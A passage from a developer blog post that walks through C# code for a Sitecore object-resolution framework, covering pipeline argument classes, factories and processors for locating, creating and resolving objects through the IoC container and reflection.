arguments.UseTypeCache); } public LocateObjectArgs CreateLocateObjectArgs(Database database = null, Language language = null, string itemPath = null, Item item = null, string typeFieldName = null, string typeName = null, Type type = null, bool useTypeCache = false) { return new LocateObjectArgs { Database = database, Language = language, ItemPath = itemPath, Item = item, TypeFieldName = typeFieldName, TypeName = typeName, Type = type }; } } } The above class implements the interface above. It just creates arguments for both the pipeline and service classes. I then defined the following interface for a pipeline processor to set the ITypeResolver (defined way up above in this post): namespace Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject.SetTypeResolverProcessor { public interface ISetTypeResolver { void Process(LocateObjectArgs args); } } This class implements the interface above: using Sandbox.Foundation.ObjectResolution.Services.Resolvers.TypeResolvers; namespace Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject.SetTypeResolverProcessor { public class SetTypeResolver : ResolveProcessor<LocateObjectArgs>, ISetTypeResolver { private readonly ITypeResolverService _typeResolverService; public SetTypeResolver(ITypeResolverService typeResolverService) { _typeResolverService = typeResolverService; } protected override bool CanProcess(LocateObjectArgs args) => base.CanProcess(args) && args.TypeResolver == null; protected override void Execute(LocateObjectArgs args) { args.TypeResolver = GetTypeResolver(); } protected virtual ITypeResolver GetTypeResolver() => _typeResolverService; } } In the class above, I’m injecting the ITypeResolverService into its constructor — this is the service class that wraps the <resolveType /> pipeline defined further up — and set it on the LocateObjectArgs instance if it’s not already set. Next, I created the following interface for a processor that will “resolve” the type from the TypeResolver set on the LocateObjectArgs instance: namespace Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject.ResolveTypeProcessor { public interface IResolveType { void Process(LocateObjectArgs args); } } The following class implements the interface above: using System; using Sandbox.Foundation.ObjectResolution.Models.Resolvers.TypeResolvers; using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.TypeResolvers; namespace Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject.ResolveTypeProcessor { public class ResolveType : ResolveProcessor<LocateObjectArgs>, IResolveType { private readonly ITypeResolverArgumentsFactory _typeResolverArgumentsFactory; public ResolveType(ITypeResolverArgumentsFactory typeResolverArgumentsFactory) { _typeResolverArgumentsFactory = typeResolverArgumentsFactory; } protected override bool CanProcess(LocateObjectArgs args) => base.CanProcess(args) && args.Type == null && args.TypeResolver != null; protected override void Execute(LocateObjectArgs args) { args.Type = Resolve(args); } protected virtual Type Resolve(LocateObjectArgs args) { TypeResolverArguments arguments = CreateTypeResolverArguments(args); if (arguments == null) { return null; } return args.TypeResolver.Resolve(arguments); } protected virtual TypeResolverArguments CreateTypeResolverArguments(LocateObjectArgs args) => _typeResolverArgumentsFactory.CreateTypeResolverArguments(args); } } The class above just “resolves” the type from the TypeResolver set on the LocateObjectArgs instance. Nothing more to see. 😉 I then defined the following interface for a family of classes that “locate” objects from somewhere (perhaps a magical place. 😉 ): using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectLocators; namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectLocators { public interface IObjectLocator { object Resolve(ObjectLocatorArguments arguments); } } Well, we can’t use much magic in this solution, so I’m going to “locate” things in the Sitecore IoC container, so defined the following interface for a class that will employ Service Locator to find it in the Sitecore IoC container: namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectLocators { public interface IServiceProviderLocator : IObjectLocator { } } This class implements the interface above: using System; using Sitecore.DependencyInjection; using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectLocators; namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectLocators { public class ServiceProviderLocator : IServiceProviderLocator { private readonly IServiceProvider _serviceProvider; public ServiceProviderLocator() { _serviceProvider = GetServiceProvider(); } protected virtual IServiceProvider GetServiceProvider() { return ServiceLocator.ServiceProvider; } public object Resolve(ObjectLocatorArguments arguments) { if (arguments == null || arguments.Type == null) { return null; } return GetService(arguments.Type); } protected virtual object GetService(Type type) => _serviceProvider.GetService(type); } } In the class above, I’m just passing a type to the System.IServiceProvider’s GetService() method — the IServiceProvider instance is grabbed from the ServiceProvider static member on Sitecore.DependencyInjection.ServiceLocator static class. Next, I need a processor class to add an instance of the Service Locator IObjectLocator class above to the collection of IObjectLocator instances on the LocateObjectArgs instance, so I defined the following interface for a processor class that does just that: namespace Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject.AddDefaultObjectLocatorProcessor { public interface IAddDefaultObjectLocator { void Process(LocateObjectArgs args); } } Here’s the implementation class for the interface above: using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectLocators; namespace Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject.AddDefaultObjectLocatorProcessor { public class AddDefaultObjectLocator : ResolveProcessor<LocateObjectArgs>, IAddDefaultObjectLocator { private readonly IServiceProviderLocator _serviceProviderLocator; public AddDefaultObjectLocator(IServiceProviderLocator serviceProviderLocator) { _serviceProviderLocator = serviceProviderLocator; } protected override bool CanProcess(LocateObjectArgs args) => base.CanProcess(args) && args.Locators != null; protected override void Execute(LocateObjectArgs args) => args.Locators.Add(GetObjectLocator()); protected virtual IObjectLocator GetObjectLocator() => _serviceProviderLocator; } } It’s just adding the IServiceProviderLocator instance to the collection of Locators set on the LocateObjectArgs instance. Great, so we have things that can “locate” objects but need to have a processor that does the execution of that step to actually find those objects. The following interface is for a processor class that does just that: namespace Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject.LocateObjectProcessor { public interface ILocateObject { void Process(LocateObjectArgs args); } } And here’s its implementation class: using System.Linq; using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectLocators; using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ObjectLocators; using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectLocators; namespace Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject.LocateObjectProcessor { public class LocateObject : ResolveProcessor<LocateObjectArgs>, ILocateObject { private readonly IObjectLocatorArgumentsFactory _objectLocatorArgumentsFactory; public LocateObject(IObjectLocatorArgumentsFactory objectLocatorArgumentsFactory) { _objectLocatorArgumentsFactory = objectLocatorArgumentsFactory; } protected override bool CanProcess(LocateObjectArgs args) => base.CanProcess(args) && args.Locators != null && args.Locators.Any() && args.Type != null; protected override void Execute(LocateObjectArgs args) => args.Object = Resolve(args); protected virtual object Resolve(LocateObjectArgs args) { ObjectLocatorArguments arguments = CreateObjectLocatorArguments(args); if (arguments == null) { return null; } foreach (IObjectLocator objectLocator in args.Locators) { object obj = objectLocator.Resolve(arguments); if (obj != null) { return obj; } } return null; } protected virtual ObjectLocatorArguments CreateObjectLocatorArguments(LocateObjectArgs args) => _objectLocatorArgumentsFactory.CreateObjectLocatorArguments(args); } } As I had done in the previous pipelines, I’m just iterating over a collection of classes that “resolve” for a particular thing — here I’m iterating over all IObjectLocator instances set on the LocateObjectArgs instance. If one of them find the object we are looking for, we just set it on the LocateObjectArgs instance. As I had done for the other pipelines, I created a service class that wraps the new pipeline I am creating. The following class serves as a settings class for that service class: namespace Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectLocators { public class ObjectLocatorServiceSettings { public string LocateObjectPipelineName { get; set; } } } An instance of the class above will be created by the Sitecore Configuration Factory, and its LocateObjectPipelineName property will contain a value defined in the Sitecore patch file further down in this post. I then created the following interface for the service class that will wrap this new pipeline: namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectLocators { public interface IObjectLocatorService : IObjectLocator { } } Here’s the class that implements the interface above: using Sitecore.Abstractions; using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectLocators; using Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject; using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ObjectLocators; namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectLocators { public class ObjectLocatorService : PipelineObjectResolver<ObjectLocatorArguments, LocateObjectArgs, object>, IObjectLocatorService { private readonly ObjectLocatorServiceSettings _settings; private readonly IObjectLocatorArgumentsFactory _objectLocatorArgumentsFactory; public ObjectLocatorService(ObjectLocatorServiceSettings settings, IObjectLocatorArgumentsFactory objectLocatorArgumentsFactory, BaseCorePipelineManager corePipelineManager) : base(corePipelineManager) { _settings = settings; _objectLocatorArgumentsFactory = objectLocatorArgumentsFactory; } protected override object GetObject(LocateObjectArgs args) { return args.Object; } protected override LocateObjectArgs CreatePipelineArgs(ObjectLocatorArguments arguments) => _objectLocatorArgumentsFactory.CreateLocateObjectArgs(arguments); protected override string GetPipelineName() => _settings.LocateObjectPipelineName; } } I’m not going talk much about the class above — it’s following the same pattern as the other classes that wrap their respective pipelines. <createObject /> So what happens when we cannot find an object via the <locateObject /> pipeline? Well, let’s create it. I defined the following PipelineArgs class for a new pipeline that creates objects: using System; using System.Collections.Generic; using Sitecore.Data; using Sitecore.Data.Items; using Sitecore.Globalization; using Sitecore.Pipelines; using Sandbox.Foundation.ObjectResolution.Services.Cachers; using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectCreators; using Sandbox.Foundation.ObjectResolution.Services.Resolvers.TypeResolvers; namespace Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject { public class CreateObjectArgs : PipelineArgs { public Database Database { get; set; } public string ItemPath { get; set; } public Language Language { get; set; } public Item Item { get; set; } public string TypeFieldName { get; set; } public string TypeName { get; set; } public ITypeResolver TypeResolver { get; set; } public Type Type { get; set; } public object[] Parameters { get; set; } public IList<IObjectCreator> Creators { get; set; } = new List<IObjectCreator>(); public object Object { get; set; } public bool UseTypeCache { get; set; } public ITypeCacher TypeCacher { get; set; } } } I then defined the following class for service classes that create objects: using System; using Sitecore.Data; using Sitecore.Data.Items; using Sitecore.Globalization; namespace Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectCreators { public class ObjectCreatorArguments { public Database Database { get; set; } public Language Language { get; set; } public string ItemPath { get; set; } public Item Item { get; set; } public string TypeFieldName { get; set; } public string TypeName { get; set; } public Type Type { get; set; } public bool UseTypeCache { get; set; } public object[] Parameters { get; set; } } } Since the “new” keyword promotes tight coupling between classes, I created the following factory interface for classes that create the two arguments types shown above: using System; using Sitecore.Data; using Sitecore.Data.Items; using Sitecore.Globalization; using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectCreators; using Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject; using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject; namespace Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ObjectCreators { public interface IObjectCreatorArgumentsFactory { ObjectCreatorArguments CreateObjectCreatorArguments(ResolveObjectArgs args); ObjectCreatorArguments CreateObjectCreatorArguments(CreateObjectArgs args); ObjectCreatorArguments CreateObjectCreatorArguments(Database database = null, Language language = null, string itemPath = null, Item item = null, string typeFieldName = null, string typeName = null, Type type = null, bool useTypeCache = false, object[] parameters = null); CreateObjectArgs CreateCreateObjectArgs(ObjectCreatorArguments arguments); CreateObjectArgs CreateCreateObjectArgs(Database database = null, Language language = null, string itemPath = null, Item item = null, string typeFieldName = null, string typeName = null, Type type = null, bool useTypeCache = false, object[] parameters = null); } } The following class implements the interface above: using System; using Sitecore.Data; using Sitecore.Data.Items; using Sitecore.Globalization; using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectCreators; using Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject; using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject; namespace Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ObjectCreators { public class ObjectCreatorArgumentsFactory : IObjectCreatorArgumentsFactory { public ObjectCreatorArguments CreateObjectCreatorArguments(ResolveObjectArgs args) { if (args == null) { return null; } return CreateObjectCreatorArguments(args.Database, args.Language, args.ItemPath, args.Item, args.TypeFieldName, args.TypeName, args.Type, args.UseTypeCache, args.ObjectCreationParameters); } public ObjectCreatorArguments CreateObjectCreatorArguments(CreateObjectArgs args) { if (args == null) { return null; } return CreateObjectCreatorArguments(args.Database, args.Language, args.ItemPath, args.Item, args.TypeFieldName, args.TypeName, args.Type, args.UseTypeCache, args.Parameters); } public ObjectCreatorArguments CreateObjectCreatorArguments(Database database = null, Language language = null, string itemPath = null, Item item = null, string typeFieldName = null, string typeName = null, Type type = null, bool useTypeCache = false, object[] parameters = null) { return new ObjectCreatorArguments { Database = database, Language = language, ItemPath = itemPath, Item = item, TypeFieldName = typeFieldName, TypeName = typeName, Type = type, Parameters = parameters }; } public CreateObjectArgs CreateCreateObjectArgs(ObjectCreatorArguments arguments) { if (arguments == null) { return null; } return CreateCreateObjectArgs(arguments.Database, arguments.Language, arguments.ItemPath, arguments.Item, arguments.TypeFieldName, arguments.TypeName, arguments.Type, arguments.UseTypeCache, arguments.Parameters); } public CreateObjectArgs CreateCreateObjectArgs(Database database = null, Language language = null, string itemPath = null, Item item = null, string typeFieldName = null, string typeName = null, Type type = null, bool useTypeCache = false, object[] parameters = null) { return new CreateObjectArgs { Database = database, Language = language, ItemPath = itemPath, Item = item, TypeFieldName = typeFieldName, TypeName = typeName, Type = type, UseTypeCache = useTypeCache, Parameters = parameters }; } } } The class above just creates CreateObjectArgs and ObjectCreatorArguments instances. Let’s jump into the bits that comprise the new pipeline. The following interface is for a processor class that sets the ITypeResolver on the CreateObjectArgs instance: namespace Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.SetTypeResolverProcessor { public interface ISetTypeResolver { void Process(CreateObjectArgs args); } } Here’s the processor class that implements the interface above: using Sandbox.Foundation.ObjectResolution.Services.Resolvers.TypeResolvers; namespace Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.SetTypeResolverProcessor { public class SetTypeResolver : ResolveProcessor<CreateObjectArgs>, ISetTypeResolver { private readonly ITypeResolverService _typeResolverService; public SetTypeResolver(ITypeResolverService typeResolverService) { _typeResolverService = typeResolverService; } protected override bool CanProcess(CreateObjectArgs args) => base.CanProcess(args) && args.Type == null && args.TypeResolver == null; protected override void Execute(CreateObjectArgs args) { args.TypeResolver = GetTypeResolver(); } protected virtual ITypeResolver GetTypeResolver() => _typeResolverService; } } Nothing special going on — we’ve seen something like this before further up in this post. Now, we need a processor to “resolve” types. The following interface is for a processor class which does just that: namespace Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.ResolveTypeProcessor { public interface IResolveType { void Process(CreateObjectArgs args); } } And here is the processor class that implements the interface above: using System; using Sandbox.Foundation.ObjectResolution.Models.Resolvers.TypeResolvers; using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.TypeResolvers; namespace Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.ResolveTypeProcessor { public class ResolveType : ResolveProcessor<CreateObjectArgs>, IResolveType { private readonly ITypeResolverArgumentsFactory _typeResolverArgumentsFactory; public ResolveType(ITypeResolverArgumentsFactory typeResolverArgumentsFactory) { _typeResolverArgumentsFactory = typeResolverArgumentsFactory; } protected override bool CanProcess(CreateObjectArgs args) => base.CanProcess(args) && args.Type == null && args.TypeResolver != null; protected override void Execute(CreateObjectArgs args) { args.Type = Resolve(args); } protected virtual Type Resolve(CreateObjectArgs args) { TypeResolverArguments arguments = CreateTypeResolverArguments(args); if (arguments == null) { return null; } return args.TypeResolver.Resolve(arguments); } protected virtual TypeResolverArguments CreateTypeResolverArguments(CreateObjectArgs args) => _typeResolverArgumentsFactory.CreateTypeResolverArguments(args); } } I’m not going to discuss much on this as we’ve already seen something like this further up in this post. I then defined the following interface for a family of classes that create objects: using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectCreators; namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectCreators { public interface IObjectCreator { object Resolve(ObjectCreatorArguments arguments); } } Since I’m not good at arts and crafts, we’ll have to use reflection to create objects. The following interface is for a class that uses reflection to create objects: namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectCreators { public interface IReflectionObjectCreator : IObjectCreator { } } The following class implements the interface above: using System.Linq; using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectCreators; using Sandbox.Foundation.ObjectResolution.Services.Reflection; namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectCreators { public class ReflectionObjectCreator : IReflectionObjectCreator { private readonly IReflectionUtilService _reflectionUtilService; public ReflectionObjectCreator(IReflectionUtilService reflectionUtilService) { _reflectionUtilService = reflectionUtilService; } public object Resolve(ObjectCreatorArguments arguments) { if (arguments == null || arguments.Type == null) { return null; } if (arguments.Parameters == null || !arguments.Parameters.Any()) { return _reflectionUtilService.CreateObject(arguments.Type); } return _reflectionUtilService.CreateObject(arguments.Type, arguments.Parameters); } } } This class above just delegates to the IReflectionUtilService instance — this is defined way up above in this post — injected into it for creating objects. Now we need to put this IReflectionObjectCreator somewhere so it can be used to create objects. The following interface is for a processor class that adds this to a collection of other IObjectCreator defined on the CreateObjectArgs instance: namespace Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.AddDefaultObjectCreatorProcessor { public interface IAddDefaultObjectCreator { void Process(CreateObjectArgs args); } } And here is the magic behind the interface above: using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectCreators; namespace Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.AddDefaultObjectCreatorProcessor { public class AddDefaultObjectCreator : ResolveProcessor<CreateObjectArgs>, IAddDefaultObjectCreator { private readonly IReflectionObjectCreator _reflectionObjectCreator; public AddDefaultObjectCreator(IReflectionObjectCreator reflectionObjectCreator) { _reflectionObjectCreator = reflectionObjectCreator; } protected override bool CanProcess(CreateObjectArgs args) => base.CanProcess(args) && args.Creators != null; protected override void Execute(CreateObjectArgs args) => args.Creators.Add(GetObjectLocator()); protected virtual IObjectCreator GetObjectLocator() => _reflectionObjectCreator; } } We are just adding the IReflectionObjectCreator instance to the Creators collection on the CreateObjectArgs instance. Now, we need a processor that delegates to each IObjectCreator instance in the collection on the CreateObjectArgs instance. The following interface is for a processor that does that: namespace Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.CreateObjectProcessor { public interface ICreateObject { void Process(CreateObjectArgs args); } } Here’s the above interface’s implementation class: using System.Linq; using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectCreators; using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject; using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ObjectCreators; using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectCreators; namespace Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.CreateObjectProcessor { public class CreateObject : ResolveProcessor<CreateObjectArgs>, ICreateObject { private readonly IObjectCreatorArgumentsFactory _objectCreatorArgumentsFactory; public CreateObject(IObjectCreatorArgumentsFactory objectCreatorArgumentsFactory) { _objectCreatorArgumentsFactory = objectCreatorArgumentsFactory; } protected override bool CanProcess(CreateObjectArgs args) => base.CanProcess(args) && args.Creators.Any(); protected override void Execute(CreateObjectArgs args) { args.Object = CreateObjectFromArguments(args); } protected virtual object CreateObjectFromArguments(CreateObjectArgs args) { ObjectCreatorArguments arguments = CreateObjectCreatorArguments(args); if (arguments == null) { return null; } foreach (IObjectCreator objectCreator in args.Creators) { object result = CreateObjectFromArguments(objectCreator, arguments); if (result != null) { return result; } } return null; } protected virtual ObjectCreatorArguments CreateObjectCreatorArguments(CreateObjectArgs args) => _objectCreatorArgumentsFactory.CreateObjectCreatorArguments(args); protected virtual object CreateObjectFromArguments(IObjectCreator objectCreator, ObjectCreatorArguments arguments) => objectCreator.Resolve(arguments); } } The above class just iterates over the IObjectCreator collection on the CreateObjectArgs instance, and tries to create an object using each. The IObjectCreatorArgumentsFactory instance assists in creating the ObjectCreatorArguments instance from the CreateObjectArgs instance so it can make such calls on each IObjectCreator instance. If an object is created from one them, it just uses that and stops the iteration. It’s probably a good idea to only cache Types when an object was actually created from the Type. The following interface is for a processor that sets a ITypeCacher on the CreateObjectArgs instance — this class will add the Type to a cache (perhaps in a bank somewhere on the Cayman Islands? 😉 ): namespace Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.SetTypeCacherProcessor { public interface ISetTypeCacher { void Process(CreateObjectArgs args); } } Here’s the implementation class for the interface above: using Sandbox.Foundation.ObjectResolution.Services.Cachers; namespace Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.SetTypeCacherProcessor { public class SetTypeCacher : ResolveProcessor<CreateObjectArgs>, ISetTypeCacher { private readonly ITypeCacher _typeCacher; public SetTypeCacher(ITypeCacher typeCacher) { _typeCacher = typeCacher; } protected override bool CanProcess(CreateObjectArgs args) => base.CanProcess(args) && args.UseTypeCache && args.TypeCacher == null; protected override void Execute(CreateObjectArgs args) => args.TypeCacher = _typeCacher; } } It’s just setting the injected ITypeCacher — the implementation class is defined further up in this post — on the CreateObjectArgs instance. Now, we need to use the ITypeCacher to cache the type. The following interface is for a processor class delegates to the ITypeCacher instance to cache the Type: namespace Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.CacheTypeProcessor { public interface ICacheType { void Process(CreateObjectArgs args); } } Here is the process class which implements the interface above: namespace Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.CacheTypeProcessor { public class CacheType : ResolveProcessor<CreateObjectArgs>, ICacheType { protected override bool CanProcess(CreateObjectArgs args) => base.CanProcess(args) && !string.IsNullOrWhiteSpace(args.TypeName) && args.Type != null && args.UseTypeCache && args.TypeCacher != null; protected override void Execute(CreateObjectArgs args) => AddTypeToCache(args); protected virtual void AddTypeToCache(CreateObjectArgs args) => args.TypeCacher.AddTypeToCache(args.TypeName, args.Type); } } It should be self-explanatory what’s happening here. If not, please drop a comment below. Now, we need a service class that wraps this new pipeline. I created the following settings class for that service: namespace Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectCreators { public class ObjectCreatorServiceSettings { public string CreateObjectPipelineName { get; set; } } } An instance of this class is created by the Sitecore Configuration Factory just as the other ones in this post are. I then defined the following interface for the service class that will wrap this new pipeline — it’s just another IObjectCreator: namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectCreators { public interface IObjectCreatorService : IObjectCreator { } } This class implements the interface above: using Sitecore.Abstractions; using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectCreators; using Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject; using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ObjectCreators; namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectCreators { public class ObjectCreatorService : PipelineObjectResolver<ObjectCreatorArguments, CreateObjectArgs, object>, IObjectCreatorService { private readonly ObjectCreatorServiceSettings _settings; private readonly IObjectCreatorArgumentsFactory _objectCreatorArgumentsFactory; public ObjectCreatorService(ObjectCreatorServiceSettings settings, IObjectCreatorArgumentsFactory objectCreatorArgumentsFactory, BaseCorePipelineManager corePipelineManager) : base(corePipelineManager) { _settings = settings; _objectCreatorArgumentsFactory = objectCreatorArgumentsFactory; } protected override object GetObject(CreateObjectArgs args) { return args.Object; } protected override CreateObjectArgs CreatePipelineArgs(ObjectCreatorArguments arguments) => _objectCreatorArgumentsFactory.CreateCreateObjectArgs(arguments); protected override string GetPipelineName() => _settings.CreateObjectPipelineName; } } I’m not going to go into details on the above as you have seen this pattern further above in this post. <resolveObject /> Now we need a way to glue together all pipelines created above. The following PipelineArgs class is for — yet another pipeline 😉 — that glues everything together: using System; using Sitecore.Data; using Sitecore.Data.Items; using Sitecore.Globalization; using Sitecore.Pipelines; using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectCreators; using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectLocators; using Sandbox.Foundation.ObjectResolution.Services.Resolvers.TypeResolvers; namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject { public class ResolveObjectArgs : PipelineArgs { public Database Database { get; set; } public string ItemPath { get; set; } public Language Language { get; set; } public Item Item { get; set; } public string TypeFieldName { get; set; } public string TypeName { get; set; } public ITypeResolver TypeResolver { get; set; } public Type Type { get; set; } public IObjectLocator ObjectLocator; public bool FoundInContainer { get; set; } public IObjectCreator ObjectCreator; public bool UseTypeCache { get; set; } public object[] ObjectCreationParameters { get; set; } public object Object { get; set; } } } I also created the following class for the service class that will wrap this new pipeline: using System; using Sitecore.Data; using Sitecore.Data.Items; using Sitecore.Globalization; namespace Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectResolvers { public class ObjectResolverArguments { public Database Database { get; set; } public Language Language { get; set; } public string ItemPath { get; set; } public Item Item { get; set; } public string TypeFieldName { get; set; } public string TypeName { get; set; } public Type Type { get; set; } public bool UseTypeCache { get; set; } public object[] ObjectCreationParameters { get; set; } } } I bet you are guessing that I’m going to create another factory for these two classes above. Yep, you are correct. Here is the interface for that factory: using System; using Sitecore.Data; using Sitecore.Data.Items; using Sitecore.Globalization; using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectResolvers; using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject; namespace Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ObjectResolvers { public interface IObjectResolverArgumentsFactory { ObjectResolverArguments CreateObjectResolverArguments(Database database, string itemPath, string typeFieldName, Language language, object[] objectCreationParameters); ObjectResolverArguments CreateObjectResolverArguments(Item item, string typeFieldName, bool useTypeCache, object[] objectCreationParameters); ResolveObjectArgs CreateResolveObjectArgs(ObjectResolverArguments arguments); ResolveObjectArgs CreateResolveObjectArgs(Database database = null, string itemPath = null, Language language = null, Item item = null, string typeFieldName = null, string typeName = null, Type type = null, bool useTypeCache = false, object[] objectCreationParameters = null); } } The following class implements the factory interface above: using System; using Sitecore.Data; using Sitecore.Data.Items; using Sitecore.Globalization; using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectResolvers; using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject; namespace Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ObjectResolvers { public class ObjectResolverArgumentsFactory : IObjectResolverArgumentsFactory { public ObjectResolverArguments CreateObjectResolverArguments(Database database, string itemPath, string typeFieldName, Language language, object[] objectCreationParameters) { return new ObjectResolverArguments { Database = database, ItemPath = itemPath, TypeFieldName = typeFieldName, Language = language, ObjectCreationParameters = objectCreationParameters }; } public ObjectResolverArguments CreateObjectResolverArguments(Item item, string typeFieldName, bool useTypeCache, object[] objectCreationParameters) { return new ObjectResolverArguments { Item = item, TypeFieldName = typeFieldName, UseTypeCache = useTypeCache, ObjectCreationParameters = objectCreationParameters }; } public ResolveObjectArgs CreateResolveObjectArgs(ObjectResolverArguments arguments) { if (arguments == null) { return null; } return CreateResolveObjectArgs(arguments.Database, arguments.ItemPath, arguments.Language, arguments.Item, arguments.TypeFieldName, arguments.TypeName, arguments.Type, arguments.UseTypeCache, arguments.ObjectCreationParameters); } public ResolveObjectArgs CreateResolveObjectArgs(Item item, string typeFieldName, object[] objectCreationParameters) { return new ResolveObjectArgs { Item = item, TypeFieldName = typeFieldName, ObjectCreationParameters = objectCreationParameters }; } public ResolveObjectArgs CreateResolveObjectArgs(Database database = null, string itemPath = null, Language language = null, Item item = null, string typeFieldName = null, string typeName = null, Type type = null, bool useTypeCache = false, object[] objectCreationParameters = null) { return new ResolveObjectArgs { Database = database, ItemPath = itemPath, Language = language, Item = item, TypeFieldName = typeFieldName, TypeName = typeName, Type= type, UseTypeCache = useTypeCache, ObjectCreationParameters = objectCreationParameters }; } } } The following interface is for a processor class that sets the ITypeResolver on the ResolveObjectArgs instance: namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject { public interface ISetTypeResolver { void Process(ResolveObjectArgs args); } } Here’s its implementation class: using Sandbox.Foundation.ObjectResolution.Services.Resolvers.TypeResolvers; namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject { public class SetTypeResolver : ResolveProcessor<ResolveObjectArgs>, ISetTypeResolver { private readonly ITypeResolverService _typeResolverService; public SetTypeResolver(ITypeResolverService typeResolverService) { _typeResolverService = typeResolverService; } protected override bool CanProcess(ResolveObjectArgs args) => base.CanProcess(args) && args.TypeResolver == null; protected override void Execute(ResolveObjectArgs args) { args.TypeResolver = GetTypeResolver(); } protected virtual ITypeResolver GetTypeResolver() => _typeResolverService; } } We have already seen this twice, so I won’t discuss it again. 😉 Next, we need to resolve the type. The following interface is for a processor class that does that type resolution: namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject.ResolveTypeProcessor { public interface IResolveType { void Process(ResolveObjectArgs args); } } Here’s the class that implements the interface above: using System; using Sandbox.Foundation.ObjectResolution.Models.Resolvers.TypeResolvers; using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.TypeResolvers; namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject.ResolveTypeProcessor { public class ResolveType : ResolveProcessor<ResolveObjectArgs>, IResolveType { private readonly ITypeResolverArgumentsFactory _typeResolverArgumentsFactory; public ResolveType(ITypeResolverArgumentsFactory typeResolverArgumentsFactory) { _typeResolverArgumentsFactory = typeResolverArgumentsFactory; } protected override bool CanProcess(ResolveObjectArgs args) => base.CanProcess(args) && args.Type == null && args.TypeResolver != null; protected override void Execute(ResolveObjectArgs args) { args.Type = Resolve(args); } protected virtual Type Resolve(ResolveObjectArgs args) { TypeResolverArguments arguments = CreateTypeResolverArguments(args); if (arguments == null) { return null; } return args.TypeResolver.Resolve(arguments); } protected virtual TypeResolverArguments CreateTypeResolverArguments(ResolveObjectArgs args) => _typeResolverArgumentsFactory.CreateTypeResolverArguments(args); } } I’m also not going to discuss this as I’ve done this somewhere up above. 😉 Now we need a processor to “locate” objects in the Sitecore IoC container. The following interface is for a processor class that does just that: namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject.SetObjectLocatorProcessor { public interface ISetObjectLocator { void Process(ResolveObjectArgs args); } } The following class implements the interface above: using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectLocators; namespace 